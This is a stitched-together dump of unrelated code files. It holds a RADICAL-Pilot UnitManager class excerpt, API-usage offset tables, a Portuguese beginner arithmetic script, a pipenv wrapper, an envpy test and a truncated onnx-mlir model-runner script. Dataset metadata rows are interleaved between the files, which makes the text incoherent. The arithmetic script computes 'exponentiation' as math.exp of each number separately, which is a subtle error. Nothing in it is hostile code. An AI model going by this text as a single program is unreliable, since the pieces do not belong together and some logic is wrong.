# FIXME: we also pull for dead units. That is not efficient...
# FIXME: this needs to be converted into a tailed cursor in the update
# worker
units = self._session._dbs.get_units(umgr_uid=self.uid)
for unit in units:
if not self._update_unit(unit, publish=True, advance=False):
return False
return True
# --------------------------------------------------------------------------
#
def _unit_pull_cb(self):
if self._terminate.is_set():
return False
# pull units from the agent which are about to get back
# under umgr control, and push them into the respective queues
# FIXME: this should also be based on a tailed cursor
# FIXME: Unfortunately, 'find_and_modify' is not bulkable, so we have
# to use 'find'. To avoid finding the same units over and over
# again, we update the 'control' field *before* running the next
# find -- so we do it right here.
unit_cursor = self.session._dbs._c.find({'type' : 'unit',
'umgr' : self.uid,
'control' : 'umgr_pending'})
if not unit_cursor.count():
# no units whatsoever...
# self._log.info("units pulled: 0")
return True # this is not an error
# update the units to avoid pulling them again next time.
units = list(unit_cursor)
uids = [unit['uid'] for unit in units]
self._log.info("units pulled: %d", len(uids))
for unit in units:
unit['control'] = 'umgr'
self._session._dbs._c.update({'type' : 'unit',
'uid' : {'$in' : uids}},
{'$set' : {'control' : 'umgr'}},
multi=True)
self._log.info("units pulled: %4d", len(units))
self._prof.prof('get', msg="bulk size: %d" % len(units), uid=self.uid)
for unit in units:
# we need to make sure to have the correct state:
uid = unit['uid']
self._prof.prof('get', uid=uid)
old = unit['state']
new = rps._unit_state_collapse(unit['states'])
if old != new:
self._log.debug("unit pulled %s: %s / %s", uid, old, new)
unit['state'] = new
# now we really own the CUs, and can start working on them (ie. push
# them into the pipeline).
to_stage = list()
to_finalize = list()
for unit in units:
# only advance units to data stager if we need data staging
# = otherwise finalize them right away
if unit['description'].get('output_staging'):
to_stage.append(unit)
else:
to_finalize.append(unit)
# don't profile state transitions - those happened in the past
if to_stage:
if self._has_sout:
# normal route: needs data stager
self.advance(to_stage, publish=True, push=True, prof=False)
else:
self._log.error('output staging needed but not available!')
for unit in to_stage:
unit['target_state'] = rps.FAILED
to_finalize.append(unit)
if to_finalize:
# shortcut, skip the data stager, but fake state transition
self.advance(to_finalize, state=rps.UMGR_STAGING_OUTPUT,
publish=True, push=False)
# move to final stata
for unit in to_finalize:
unit['state'] = unit['target_state']
self.advance(to_finalize, publish=True, push=False)
return True
# --------------------------------------------------------------------------
#
def _state_sub_cb(self, topic, msg):
if self._terminate.is_set():
return False
cmd = msg.get('cmd')
arg = msg.get('arg')
if cmd != 'update':
self._log.debug('ignore state cb msg with cmd %s', cmd)
return True
if isinstance(arg, list): things = arg
else : things = [arg]
cb_requests = list()
for thing in things:
if thing.get('type') == 'unit':
# we got the state update from the state callback - don't
# publish it again
to_notify = self._update_unit(thing, publish=False,
advance=False)
if to_notify:
cb_requests += to_notify
else:
self._log.debug('umgr state cb ignores %s/%s', thing.get('uid'),
thing.get('state'))
if cb_requests:
if _USE_BULK_CB:
self._bulk_cbs(set([unit for unit,state in cb_requests]))
else:
for unit,state in cb_requests:
self._unit_cb(unit, state)
return True
# --------------------------------------------------------------------------
#
def _update_unit(self, unit_dict, publish=False, advance=False):
uid = unit_dict['uid']
# return information about needed callback and advance activities, so
# that we don't break bulks here.
# note however that individual unit callbacks are still being called on
# each unit (if any are registered), which can lead to arbitrary,
# application defined delays.
to_notify = list()
with self._units_lock:
# we don't care about units we don't know
if uid not in self._units:
self._log.debug('umgr: unknown: %s', uid)
return None
unit = self._units[uid]
# only update on state changes
current = unit.state
target = unit_dict['state']
if current == target:
self._log.debug('umgr: static: %s', uid)
return None
target, passed = rps._unit_state_progress(uid, current, target)
if target in [rps.CANCELED, rps.FAILED]:
# don't replay intermediate states
passed = passed[-1:]
for s in passed:
unit_dict['state'] = s
self._units[uid]._update(unit_dict)
to_notify.append([unit, s])
# we don't usually advance state at this point, but just keep up
# with state changes reported from elsewhere
if advance:
self.advance(unit_dict, s, publish=publish, push=False,
prof=False)
self._log.debug('umgr: notify: %s %s %s', len(to_notify), unit_dict,
unit_dict['state'])
return to_notify
# --------------------------------------------------------------------------
#
def _unit_cb(self, unit, state):
with self._cb_lock:
uid = unit.uid
cb_dicts = list()
metric = rpc.UNIT_STATE
# get wildcard callbacks
cb_dicts += self._callbacks[metric].get('*', {}).values()
cb_dicts += self._callbacks[metric].get(uid, {}).values()
for cb_dict in cb_dicts:
cb = cb_dict['cb']
cb_data = cb_dict['cb_data']
try:
if cb_data: cb(unit, state, cb_data)
else : cb(unit, state)
except:
self._log.exception('cb error (%s)', cb.__name__)
# --------------------------------------------------------------------------
#
def _bulk_cbs(self, units, metrics=None):
if not metrics: metrics = [rpc.UNIT_STATE]
else : metrics = ru.as_list(metrics)
cbs = dict() # bulked callbacks to call
with self._cb_lock:
for metric in metrics:
# get wildcard callbacks
cb_dicts = self._callbacks[metric].get('*')
for cb_name in cb_dicts:
cbs[cb_name] = {'cb' : cb_dicts[cb_name]['cb'],
'cb_data': cb_dicts[cb_name]['cb_data'],
'units' : set(units)}
# add unit specific callbacks if needed
for unit in units:
uid = unit.uid
if uid not in self._callbacks[metric]:
continue
cb_dicts = self._callbacks[metric].get(uid, {})
for cb_name in cb_dicts:
if cb_name in cbs:
cbs[cb_name]['units'].add(unit)
else:
cbs[cb_name] = {'cb' : cb_dicts[cb_name]['cb'],
'cb_data': cb_dicts[cb_name]['cb_data'],
'units' : set([unit])}
for cb_name in cbs:
cb = cbs[cb_name]['cb']
cb_data = cbs[cb_name]['cb_data']
objs = cbs[cb_name]['units']
if cb_data: cb(list(objs), cb_data)
else : cb(list(objs))
# --------------------------------------------------------------------------
#
# FIXME: this needs to go to the scheduler
def _default_wait_queue_size_cb(self, umgr, wait_queue_size):
# FIXME: this needs to come from the scheduler?
if self._terminate.is_set():
return False
self._log.info("[Callback]: wait_queue_size: %s.", wait_queue_size)
# --------------------------------------------------------------------------
#
@property
def uid(self):
"""
Returns the unique id.
"""
return self._uid
# --------------------------------------------------------------------------
#
@property
def scheduler(self):
"""
Returns the scheduler name.
"""
return self._cfg.get('scheduler')
# --------------------------------------------------------------------------
#
def add_pilots(self, pilots):
"""
Associates one or more pilots with the unit manager.
**Arguments:**
* **pilots** [:class:`radical.pilot.ComputePilot` or list of
:class:`radical.pilot.ComputePilot`]: The pilot objects that will be
added to the unit manager.
"""
if not isinstance(pilots, list):
pilots = [pilots]
if len(pilots) == 0:
raise ValueError('cannot add no pilots')
with self._pilots_lock:
# sanity check, and keep pilots around for inspection
for pilot in pilots:
pid = pilot.uid
if pid in self._pilots:
raise ValueError('pilot %s already added' % pid)
self._pilots[pid] = pilot
# subscribe for state updates
pilot.register_callback(self._pilot_state_cb)
pilot_docs = [pilot.as_dict() for pilot in pilots]
# publish to the command channel for the scheduler to pick up
self.publish(rpc.CONTROL_PUBSUB, {'cmd' : 'add_pilots',
'arg' : {'pilots': pilot_docs,
'umgr' : self.uid}})
# --------------------------------------------------------------------------
#
def list_pilots(self):
"""
Lists the UIDs of the pilots currently associated with the unit manager.
**Returns:**
* A list of :class:`radical.pilot.ComputePilot` UIDs [`string`].
"""
with self._pilots_lock:
return list(self._pilots.keys())
# --------------------------------------------------------------------------
#
def get_pilots(self):
"""
Get the pilots instances currently associated with the unit manager.
**Returns:**
* A list of :class:`radical.pilot.ComputePilot` instances.
"""
with self._pilots_lock:
return list(self._pilots.values())
# --------------------------------------------------------------------------
#
def remove_pilots(self, pilot_ids, drain=False):
"""
Disassociates one or more pilots from the unit manager.
After a pilot has been removed from a unit manager, it won't process
any of the unit manager's units anymore. Calling `remove_pilots`
doesn't stop the pilot itself.
**Arguments:**
* **drain** [`boolean`]: Drain determines what happens to the units
which are managed by the removed pilot(s). If `True`, all units
currently assigned to the pilot are allowed to finish execution.
If `False` (the default), then non-final units will be canceled.
"""
# TODO: Implement 'drain'.
# NOTE: the actual removal of pilots from the scheduler is asynchron!
if drain:
raise RuntimeError("'drain' is not yet implemented")
if not isinstance(pilot_ids, list):
pilot_ids = [pilot_ids]
if len(pilot_ids) == 0:
raise ValueError('cannot remove no pilots')
with self._pilots_lock:
# sanity check, and keep pilots around for inspection
for pid in pilot_ids:
if pid not in self._pilots:
raise ValueError('pilot %s not removed' % pid)
del(self._pilots[pid])
# publish to the command channel for the scheduler to pick up
self.publish(rpc.CONTROL_PUBSUB, {'cmd' : 'remove_pilots',
'arg' : {'pids' : pilot_ids,
'umgr' : self.uid}})
# --------------------------------------------------------------------------
#
def list_units(self):
"""
Returns the UIDs of the :class:`radical.pilot.ComputeUnit` managed by
this unit manager.
**Returns:**
* A list of :class:`radical.pilot.ComputeUnit` UIDs [`string`].
"""
with self._pilots_lock:
return list(self._units.keys())
# --------------------------------------------------------------------------
#
def submit_units(self, descriptions):
"""
Submits on or more :class:`radical.pilot.ComputeUnit` instances to the
unit manager.
**Arguments:**
* **descriptions** [:class:`radical.pilot.ComputeUnitDescription`
or list of :class:`radical.pilot.ComputeUnitDescription`]: The
description of the compute unit instance(s) to create.
**Returns:**
* A list of :class:`radical.pilot.ComputeUnit` objects.
"""
from .compute_unit import ComputeUnit
ret_list = True
if not isinstance(descriptions, list):
ret_list = False
descriptions = [descriptions]
if len(descriptions) == 0:
raise ValueError('cannot submit no unit descriptions')
# we return a list of compute units
self._rep.progress_tgt(len(descriptions), label='submit')
units = list()
for ud in descriptions:
if not ud.executable:
raise ValueError('compute unit executable must be defined')
unit = ComputeUnit(umgr=self, descr=ud)
units.append(unit)
# keep units around
with self._units_lock:
self._units[unit.uid] = unit
if self._session._rec:
ru.write_json(ud.as_dict(), "%s/%s.batch.%03d.json"
% (self._session._rec, unit.uid, self._rec_id))
self._rep.progress()
self._rep.progress_done()
if self._session._rec:
self._rec_id += 1
# insert units into the database, as a bulk.
unit_docs = [u.as_dict() for u in units]
self._session._dbs.insert_units(unit_docs)
# Only after the insert can we hand the units over to the next
# components (ie. advance state).
self.advance(unit_docs, rps.UMGR_SCHEDULING_PENDING,
publish=True, push=True)
if ret_list: return units
else : return units[0]
# --------------------------------------------------------------------------
#
def get_units(self, uids=None):
"""Returns one or more compute units identified by their IDs.
**Arguments:**
* **uids** [`string` or `list of strings`]: The IDs of the
compute unit objects to return.
**Returns:**
* A list of :class:`radical.pilot.ComputeUnit` objects.
"""
if not uids:
with self._units_lock:
ret = list(self._units.values())
return ret
ret_list = True
if (not isinstance(uids, list)) and (uids is not None):
ret_list = False
uids = [uids]
ret = list()
with self._units_lock:
for uid in uids:
if uid not in self._units:
raise ValueError('unit %s not known' % uid)
ret.append(self._units[uid])
if ret_list: return ret
else : return ret[0]
# --------------------------------------------------------------------------
#
def wait_units(self, uids=None, state=None, timeout=None):
"""
Returns when one or more :class:`radical.pilot.ComputeUnits` reach a
specific state.
If `uids` is `None`, `wait_units` returns when **all**
ComputeUnits reach the state defined in `state`. This may include
units which have previously terminated or waited upon.
**Example**::
# TODO -- add example
**Arguments:**
* **uids** [`string` or `list of strings`]
If uids is set, only the ComputeUnits with the specified
uids are considered. If uids is `None` (default), all
ComputeUnits are considered.
* **state** [`string`]
The state that ComputeUnits have to reach in order for the call
to return.
By default `wait_units` waits for the ComputeUnits to
reach a terminal state, which can be one of the following:
* :data:`radical.pilot.rps.DONE`
* :data:`radical.pilot.rps.FAILED`
* :data:`radical.pilot.rps.CANCELED`
* **timeout** [`float`]
Timeout in seconds before the call returns regardless of Pilot
state changes. The default value **None** waits forever.
"""
if not uids:
with self._units_lock:
uids = list()
for uid,unit in self._units.items():
if unit.state not in rps.FINAL:
uids.append(uid)
if not state : states = rps.FINAL
elif not isinstance(state, list): states = [state]
else : states = state
# we simplify state check by waiting for the *earliest* of the given
# states - if the unit happens to be in any later state, we are sure the
# earliest has passed as well.
check_state_val = rps._unit_state_values[rps.FINAL[-1]]
for state in states:
check_state_val = min(check_state_val,
rps._unit_state_values[state])
ret_list = True
if not isinstance(uids, list):
ret_list = False
uids = [uids]
start = time.time()
to_check = None
with self._units_lock:
to_check = [self._units[uid] for uid in uids]
# We don't want to iterate over all units again and again, as that would
# duplicate checks on units which were found in matching states. So we
# create a list from which we drop the units as we find them in
# a matching state
self._rep.progress_tgt(len(to_check), label='wait')
while to_check and not self._terminate.is_set():
# check timeout
if timeout and (timeout <= (time.time() - start)):
self._log.debug ("wait timed out")
break
time.sleep (0.1)
# FIXME: print percentage...
# print 'wait units: %s' % [[u.uid, u.state] for u in to_check]
check_again = list()
for unit in to_check:
# we actually don't check if a unit is in a specific (set of)
# state(s), but rather check if it ever *has been* in any of
# those states
if unit.state not in rps.FINAL and \
rps._unit_state_values[unit.state] < check_state_val:
# this unit does not match the wait criteria
check_again.append(unit)
else:
# stop watching this unit
if unit.state in [rps.FAILED]:
self._rep.progress() # (color='error', c='-')
elif unit.state in [rps.CANCELED]:
self._rep.progress() # (color='warn', c='*')
else:
self._rep.progress() # (color='ok', c='+')
to_check = check_again
self._rep.progress_done()
# grab the current states to return
state = None
with self._units_lock:
states = [self._units[uid].state for uid in uids]
sdict = {state: states.count(state) for state in set(states)}
for state in sorted(set(states)):
self._rep.info('\t%-10s: %5d\n' % (state, sdict[state]))
if to_check: self._rep.warn('>>timeout\n')
else : self._rep.ok ('>>ok\n')
# done waiting
if ret_list: return states
else : return states[0]
# --------------------------------------------------------------------------
#
def cancel_units(self, uids=None):
"""
Cancel one or more :class:`radical.pilot.ComputeUnits`.
Note that cancellation of units is *immediate*, i.e. their state is
immediately set to `CANCELED`, even if some RP component may still
operate on the units. Specifically, other state transitions, including
other final states (`DONE`, `FAILED`) can occur *after* cancellation.
This is a side effect of an optimization: we consider this
acceptable tradeoff in the sense "Oh, that unit was DONE at point of
cancellation -- ok, we can use the results, sure!".
If that behavior is not wanted, set the environment variable:
export RADICAL_PILOT_STRICT_CANCEL=True
**Arguments:**
* **uids** [`string` or `list of strings`]: The IDs of the
compute units objects to cancel.
"""
if not uids:
with self._units_lock:
uids = list(self._units.keys())
else:
if not isinstance(uids, list):
uids = [uids]
# NOTE: We advance all units to cancelled, and send a cancellation
# control command. If that command is picked up *after* some
# state progression, we'll see state transitions after cancel.
# For non-final states that is not a problem, as it is equivalent
# with a state update message race, which our state collapse
# mechanism accounts for. For an eventual non-canceled final
# state, we do get an invalid state transition. That is also
# corrected eventually in the state collapse, but the point
# remains, that the state model is temporarily violated. We
# consider this a side effect of the fast-cancel optimization.
#
# The env variable 'RADICAL_PILOT_STRICT_CANCEL == True' will
# disable this optimization.
#
# FIXME: the effect of the env var is not well tested
if 'RADICAL_PILOT_STRICT_CANCEL' not in os.environ:
with self._units_lock:
units = [self._units[uid] for uid in uids ]
unit_docs = [unit.as_dict() for unit in units]
self.advance(unit_docs, state=rps.CANCELED, publish=True, push=True)
# we *always* issue the cancellation command to the local components
self.publish(rpc.CONTROL_PUBSUB, {'cmd' : 'cancel_units',
'arg' : {'uids' : uids,
'umgr' : self.uid}})
# we also inform all pilots about the cancelation request
self._session._dbs.pilot_command(cmd='cancel_units', arg={'uids':uids})
# In the default case of calling 'advance' above, we just set the state,
# so we *know* units are canceled. But we nevertheless wait until that
# state progression trickled through, so that the application will see
# the same state on unit inspection.
self.wait_units(uids=uids)
# --------------------------------------------------------------------------
#
def register_callback(self, cb, cb_data=None, metric=None, uid=None):
"""
Registers a new callback function with the UnitManager. Manager-level
callbacks get called if the specified metric changes. The default
metric `UNIT_STATE` fires the callback if any of the ComputeUnits
managed by the PilotManager change their state.
All callback functions need to have the same signature::
def cb(obj, value)
where ``object`` is a handle to the object that triggered the callback,
``value`` is the metric, and ``data`` is the data provided on
callback registration.. In the example of `UNIT_STATE` above, the
object would be the unit in question, and the value would be the new
state of the unit.
If 'cb_data' is given, then the 'cb' signature changes to
def cb(obj, state, cb_data)
and 'cb_data' are passed unchanged.
If 'uid' is given, the callback will invoked only for the specified
unit.
Available metrics are:
* `UNIT_STATE`: fires when the state of any of the units which are
managed by this unit manager instance is changing. It communicates
the unit object instance and the units new state.
* `WAIT_QUEUE_SIZE`: fires when the number of unscheduled units (i.e.
of units which have not been assigned to a pilot for execution)
changes.
"""
# FIXME: the signature should be (self, metrics, cb, cb_data)
if not metric:
metric = rpc.UNIT_STATE
if metric not in rpc.UMGR_METRICS:
raise ValueError ("Metric '%s' not available on the umgr" % metric)
if not uid:
uid = '*'
elif uid not in self._units:
raise ValueError('no such unit %s' % uid)
with self._cb_lock:
cb_name = cb.__name__
if metric not in self._callbacks:
self._callbacks[metric] = dict()
if uid not in self._callbacks[metric]:
self._callbacks[metric][uid] = dict()
self._callbacks[metric][uid][cb_name] = {'cb' : cb,
'cb_data' : cb_data}
# --------------------------------------------------------------------------
#
def unregister_callback(self, cb=None, metrics=None, uid=None):
if not metrics: metrics = [rpc.UMGR_METRICS]
else : metrics = ru.as_list(metrics)
if not uid:
uid = '*'
elif uid not in self._units:
raise ValueError('no such unit %s' % uid)
for metric in metrics:
if metric not in rpc.UMGR_METRICS :
raise ValueError ("invalid umgr metric '%s'" % metric)
with self._cb_lock:
for metric in metrics:
if metric not in rpc.UMGR_METRICS :
raise ValueError("cb metric '%s' unknown" % metric)
if metric not in self._callbacks:
raise ValueError("cb metric '%s' invalid" % metric)
if uid not in self._callbacks[metric]:
raise ValueError("cb target '%s' invalid" % uid)
if cb:
to_delete = [cb.__name__]
else:
to_delete = list(self._callbacks[metric][uid].keys())
for cb_name in to_delete:
if cb_name not in self._callbacks[uid][metric]:
raise ValueError("cb %s not registered" % cb_name)
del(self._callbacks[uid][metric][cb_name])
# ------------------------------------------------------------------------------
| [
"radical.utils.RLock",
"os.environ.get",
"radical.utils.as_list",
"time.sleep",
"threading.Event",
"radical.utils.atfork",
"radical.utils.Config",
"time.time",
"radical.utils.generate_id"
] | [((2898, 2926), 'radical.utils.RLock', 'ru.RLock', (['"""umgr.pilots_lock"""'], {}), "('umgr.pilots_lock')\n", (2906, 2926), True, 'import radical.utils as ru\n'), ((2990, 3017), 'radical.utils.RLock', 'ru.RLock', (['"""umgr.units_lock"""'], {}), "('umgr.units_lock')\n", (2998, 3017), True, 'import radical.utils as ru\n'), ((3081, 3105), 'radical.utils.RLock', 'ru.RLock', (['"""umgr.cb_lock"""'], {}), "('umgr.cb_lock')\n", (3089, 3105), True, 'import radical.utils as ru\n'), ((3134, 3144), 'threading.Event', 'mt.Event', ([], {}), '()\n', (3142, 3144), True, 'import threading as mt\n'), ((3272, 3343), 'radical.utils.generate_id', 'ru.generate_id', (['"""umgr.%(item_counter)04d"""', 'ru.ID_CUSTOM'], {'ns': 'session.uid'}), "('umgr.%(item_counter)04d', ru.ID_CUSTOM, ns=session.uid)\n", (3286, 3343), True, 'import radical.utils as ru\n'), ((3832, 3883), 'radical.utils.Config', 'ru.Config', (['"""radical.pilot.umgr"""'], {'name': 'name', 'cfg': 'cfg'}), "('radical.pilot.umgr', name=name, cfg=cfg)\n", (3841, 3883), True, 'import radical.utils as ru\n'), ((6246, 6318), 'radical.utils.atfork', 'ru.atfork', (['self._atfork_prepare', 'self._atfork_parent', 'self._atfork_child'], {}), '(self._atfork_prepare, self._atfork_parent, self._atfork_child)\n', (6255, 6318), True, 'import radical.utils as ru\n'), ((32743, 32754), 'time.time', 'time.time', ([], {}), '()\n', (32752, 32754), False, 'import time\n'), ((407, 450), 'os.environ.get', 'os.environ.get', (['"""RADICAL_PILOT_BULK_CB"""', '""""""'], {}), "('RADICAL_PILOT_BULK_CB', '')\n", (421, 450), False, 'import os\n'), ((20685, 20704), 'radical.utils.as_list', 'ru.as_list', (['metrics'], {}), '(metrics)\n', (20695, 20704), True, 'import radical.utils as ru\n'), ((33425, 33440), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (33435, 33440), False, 'import time\n'), ((40888, 40907), 'radical.utils.as_list', 'ru.as_list', (['metrics'], {}), '(metrics)\n', (40898, 40907), True, 'import radical.utils as ru\n'), ((33316, 33327), 'time.time', 'time.time', ([], {}), '()\n', (33325, 33327), False, 'import time\n')] |
'''Escreva um programa que solicite ao usuário dois números e apresente na tela os resultados das
operações aritméticas (soma, subtração, multiplicação, divisão, resto da divisão, exponenciação, radiciação)'''
import math
num1 = float(input('Informe um numero: '))
num2 = float(input('Informe outro numero: '))
print(f'a soma dos numeros sao: {num1+num2}')
print(f'a subtracao dos numeros sao: {num1-num2}')
print(f'a multiplicacao dos numeros sao: {num1*num2}')
print(f'a divisao dos numeros sao: {num1/num2}')
print(f'o resto da divisao dos numeros sao: {num1%num2}')
print(f'a exponenciacao dos numeros sao: {math.exp(num1), math.exp(num2)}')
print(f'a radiciacao dos numeros sao: {math.sqrt(num1), math.sqrt(num2)}') | [
"math.exp",
"math.sqrt"
] | [((614, 628), 'math.exp', 'math.exp', (['num1'], {}), '(num1)\n', (622, 628), False, 'import math\n'), ((630, 644), 'math.exp', 'math.exp', (['num2'], {}), '(num2)\n', (638, 644), False, 'import math\n'), ((687, 702), 'math.sqrt', 'math.sqrt', (['num1'], {}), '(num1)\n', (696, 702), False, 'import math\n'), ((704, 719), 'math.sqrt', 'math.sqrt', (['num2'], {}), '(num2)\n', (713, 719), False, 'import math\n')] |
import os
import shutil
import subprocess
from possum.exc import PipenvPathNotFound
class PipenvWrapper:
def __init__(self):
self.pipenv_path = shutil.which('pipenv')
if not self.pipenv_path:
raise PipenvPathNotFound
# Force pipenv to ignore any currently active pipenv environment
os.environ['PIPENV_IGNORE_VIRTUALENVS'] = '1'
@property
def venv_path(self):
return self.get_virtual_environment_path()
def create_virtual_environment(self):
p = subprocess.Popen(
[self.pipenv_path, '--three'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
p.communicate()
def get_virtual_environment_path(self):
p = subprocess.Popen(
[self.pipenv_path, '--venv'],
stdout=subprocess.PIPE
)
result = p.communicate()
return result[0].decode('ascii').strip('\n')
def get_site_packages(self):
return subprocess.check_output(
[
'pipenv', 'run', 'python', '-c',
'from distutils.sysconfig import get_python_lib; '
'print(get_python_lib())'
],
universal_newlines=True
).strip()
def install_packages(self):
p = subprocess.Popen(
[self.pipenv_path, 'install'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def remove_virtualenv(self):
p = subprocess.Popen(
[self.pipenv_path, '--rm'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def check_package_title(self, package):
try:
# Yes, this needs to be better, but performing this one-liner
# though the Pipenv environment of the project only seems to work
# when 'shell=True' is set.
return subprocess.check_output(
f'{self.pipenv_path} run python -c "import '
f'{package}; print({package}.__title__)"',
shell=True, universal_newlines=True
).strip()
except subprocess.CalledProcessError:
return package
| [
"subprocess.check_output",
"subprocess.Popen",
"shutil.which"
] | [((159, 181), 'shutil.which', 'shutil.which', (['"""pipenv"""'], {}), "('pipenv')\n", (171, 181), False, 'import shutil\n'), ((527, 626), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, '--three']"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "([self.pipenv_path, '--three'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n", (543, 626), False, 'import subprocess\n'), ((750, 820), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, '--venv']"], {'stdout': 'subprocess.PIPE'}), "([self.pipenv_path, '--venv'], stdout=subprocess.PIPE)\n", (766, 820), False, 'import subprocess\n'), ((1301, 1406), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, 'install']"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "([self.pipenv_path, 'install'], stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n", (1317, 1406), False, 'import subprocess\n'), ((1519, 1621), 'subprocess.Popen', 'subprocess.Popen', (["[self.pipenv_path, '--rm']"], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL'}), "([self.pipenv_path, '--rm'], stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n", (1535, 1621), False, 'import subprocess\n'), ((990, 1157), 'subprocess.check_output', 'subprocess.check_output', (["['pipenv', 'run', 'python', '-c',\n 'from distutils.sysconfig import get_python_lib; print(get_python_lib())']"], {'universal_newlines': '(True)'}), "(['pipenv', 'run', 'python', '-c',\n 'from distutils.sysconfig import get_python_lib; print(get_python_lib())'\n ], universal_newlines=True)\n", (1013, 1157), False, 'import subprocess\n'), ((1957, 2111), 'subprocess.check_output', 'subprocess.check_output', (['f"""{self.pipenv_path} run python -c "import {package}; print({package}.__title__)\\""""'], {'shell': '(True)', 'universal_newlines': '(True)'}), '(\n f\'{self.pipenv_path} run python -c "import {package}; print({package}.__title__)"\'\n , shell=True, universal_newlines=True)\n', (1980, 2111), False, 'import subprocess\n')] |
import pytest
import envpy
import os
folder = os.path.dirname(__file__)
folder_env_file = f'{folder}/resources'
file_dot_env = 'test.env'
def test__init__():
karg = {'filepath':folder_env_file, 'filename':file_dot_env}
envpy.get_variables(**karg)
envpy.printenv(envpy.get_variables(**karg))
if __name__ == "__main__":
test__init__() | [
"os.path.dirname",
"envpy.get_variables"
] | [((47, 72), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (62, 72), False, 'import os\n'), ((230, 257), 'envpy.get_variables', 'envpy.get_variables', ([], {}), '(**karg)\n', (249, 257), False, 'import envpy\n'), ((277, 304), 'envpy.get_variables', 'envpy.get_variables', ([], {}), '(**karg)\n', (296, 304), False, 'import envpy\n')] |
import os
import sys
import argparse
import onnx
import time
import subprocess
import numpy as np
import tempfile
from onnx import numpy_helper
from collections import OrderedDict
# Command arguments.
parser = argparse.ArgumentParser()
parser.add_argument('model_path', type=str, help="Path to the ONNX model.")
parser.add_argument('--print_input',
action='store_true',
help="Print out inputs")
parser.add_argument('--print_output',
action='store_true',
help="Print out outputs")
parser.add_argument('--compile_args',
type=str,
default="",
help="Arguments passed directly to onnx-mlir command."
" See bin/onnx-mlir --help")
parser.add_argument(
'--shape_info',
type=str,
help="Shape for each dynamic input, e.g. 0:1x10x20,1:7x5x3")
parser.add_argument('--verify',
choices=['onnxruntime', 'ref'],
help="Verify the output by using onnxruntime or reference"
" inputs/outputs. By default, no verification")
parser.add_argument(
'--ref_folder',
type=str,
help="Path to the folder containing reference inputs and outputs stored"
" in protobuf. Used when --verify=ref")
parser.add_argument('--rtol',
type=str,
default="0.05",
help="Relative tolerance for verification")
parser.add_argument('--atol',
type=str,
default="0.01",
help="Absolute tolerance for verification")
args = parser.parse_args()
if (not os.environ.get('ONNX_MLIR_HOME', None)):
raise RuntimeError(
"Environment variable ONNX_MLIR_HOME is not set, please set it to the path to "
"the HOME directory for onnx-mlir. The HOME directory for onnx-mlir refers to "
"the parent folder containing the bin, lib, etc sub-folders in which ONNX-MLIR "
"executables and libraries can be found.")
VERBOSE = os.environ.get('VERBOSE', False)
ONNX_MLIR_EXENAME = "onnx-mlir"
if sys.platform == "win32":
ONNX_MLIR_EXENAME = "onnx-mlir.exe"
ONNX_MLIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "bin",
ONNX_MLIR_EXENAME)
# Include runtime directory in python paths, so PyRuntime can be imported.
RUNTIME_DIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "lib")
sys.path.append(RUNTIME_DIR)
try:
from PyRuntime import ExecutionSession
except ImportError:
raise ImportError(
"Looks like you did not build the PyRuntime target, build it by running `make PyRuntime`."
)
def ordinal(n):
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return str(n) + suffix
def execute_commands(cmds):
if (VERBOSE):
print(cmds)
subprocess.call(cmds, shell=True)
def extend_model_output(model, intermediate_outputs):
# onnx-mlir doesn't care about manually specified output types & shapes.
DUMMY_TENSOR_TYPE = onnx.TensorProto.FLOAT
while (len(model.graph.output)):
model.graph.output.pop()
for output_name in intermediate_outputs:
output_value_info = onnx.helper.make_tensor_value_info(
output_name, DUMMY_TENSOR_TYPE, None)
model.graph.output.extend([output_value_info])
return model
def read_input_from_refs(model, ref_folder):
print("Reading inputs from {} ...".format(ref_folder))
i = 0
inputs = []
input_names = []
initializers = list(map(lambda x: x.name, model.graph.initializer))
for input_proto in model.graph.input:
if input_proto.name not in initializers:
input_names.append(input_proto.name)
input_file = ref_folder + '/input_{}.pb'.format(i)
input_ts = onnx.TensorProto()
with open(input_file, 'rb') as f:
input_ts.ParseFromString(f.read())
inputs += [numpy_helper.to_array(input_ts)]
i += 1
print(" done.\n")
return (inputs, input_names)
def read_output_from_refs(model, ref_folder):
print("Reading reference outputs from {} ...".format(ref_folder))
reference_output = []
for i, _ in enumerate(model.graph.output):
output_file = ref_folder + '/output_{}.pb'.format(i)
output_ts = onnx.TensorProto()
with open(output_file, 'rb') as f:
output_ts.ParseFromString(f.read())
reference_output += [numpy_helper.to_array(output_ts)]
print(" done.\n")
return reference_output
def generate_random_input(model, input_shapes):
print("Generating random inputs ...")
# Generate random data as input.
inputs = []
input_names = []
initializers = list(map(lambda x: x.name, model.graph.initializer))
np.random.seed(42)
for i, input_proto in enumerate(model.graph.input):
if input_proto.name in initializers:
continue
input_names.append(input_proto.name)
shape_proto = input_proto.type.tensor_type.shape
explicit_shape = []
for d, dim in enumerate(shape_proto.dim):
if dim.dim_value:
explicit_shape.append(dim.dim_value)
continue
if i in input_shapes:
if d < len(input_shapes[i]):
explicit_shape.append(input_shapes[i][d])
else:
print("The {} dim".format(ordinal(d + 1)),
"of the {} input is unknown.".format(ordinal(i + 1)),
"Use --shape_info to set.")
print(shape_proto)
exit()
else:
print("The shape of the {} input".format(ordinal(i + 1)),
"is unknown. Use --shape_info to set.")
print(shape_proto)
exit()
inputs.append(
np.random.uniform(-1.0, 1.0, explicit_shape).astype(np.float32))
print(" done.\n")
return (inputs, input_names)
def main():
# Get shape information if given.
